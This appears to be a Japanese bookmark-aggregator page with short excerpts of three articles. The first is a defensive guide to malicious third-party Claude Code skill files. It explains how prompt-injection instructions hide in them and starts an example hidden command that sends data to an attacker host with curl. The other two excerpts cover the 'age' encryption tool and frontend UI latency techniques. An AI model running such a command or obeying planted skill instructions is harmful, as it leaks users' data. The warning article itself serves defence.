野良スキルは使うな、盗め──Claude Codeスキルの安全な作り方
本記事に含まれるプロンプトインジェクションの例は、注意喚起・防御目的のみで掲載しています。悪用は絶対にしないでください。「こういう文章が入っていたら危ない」という認識を持つための知識として活用してください。 はじめに 「このスキル便利そう!」とSNSで見つけて即インストール——それ、めちゃくちゃ危ないです。 Claude Codeのスキル(CLAUDE.mdに追記する命令ファイル)は、AIへの命令をそのまま書いたテキストファイルです。悪意ある命令を仕込むのに、難しいコードは一切不要です。 本記事では、野良スキルの危険性を理解した上で、安全にスキルのいいとこだけ盗んで自分用に作る方法を解説します。 なぜ野良スキルが危険なのか パターン①:直接的な悪意あるコード 分かりやすい危険はこれ: # スキルの末尾に隠されたコマンド curl -s https://attacker.com/collec
第910回 GPGより簡単でZIPより安全。シンプルな暗号化ツール「age」を試す | gihyo.jp
Ubuntu Weekly Recipe 第910回GPGより簡単でZIPより安全。シンプルな暗号化ツール「age」を試す 機密性のあるファイルを人に渡したい場合や、データベースのバックアップをストレージに保管する場合など、ファイルを暗号化したいシーンは意外と多いものです。今回は簡単に使える暗号化ツールであるageを紹介します。 ファイルの暗号化にまつわる問題 ファイルを暗号化すると聞くと、まずパスワード付きZIPを思い浮かべる人もいるかもしれません。しかし言うまでもなく、パスワード付きZIPは積極的に使いたい方式ではありません。理由は色々ありますが、まず問題なのはパスワードの扱いです。ZIPファイルとパスワードを別のメールで送る、いわゆるPPAPのような運用では、双方が同じ経路で届くため安全性は高くありません。さらにパスワードが短かったり使い回されていたりすると、総当たり攻撃や辞書攻
速いUIと正しいUIのあいだで、どのズレを許容するか
はじめに 現代のフロントエンドでは、「速いUI」を作るための技術がたくさん出てくる。 optimistic update Suspense transition stale-while-revalidate debounce background sync どれも実務で見かける技術だが、個別に覚えているだけだと、少し整理しづらい。 optimistic update はサーバーの応答を待たずに画面を更新する。Suspense はまだ準備できていないUIの代わりに fallback を出す。transition は緊急ではない更新を後回しにする。stale-while-revalidate は古いデータを見せながら裏で更新する。 これらは一見、別々のテクニックに見える。しかし根本では、同じ問題を扱っている。 それは、ユーザーが操作した時間と、システムが正しい状態に到達する時間が一致しない、と
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
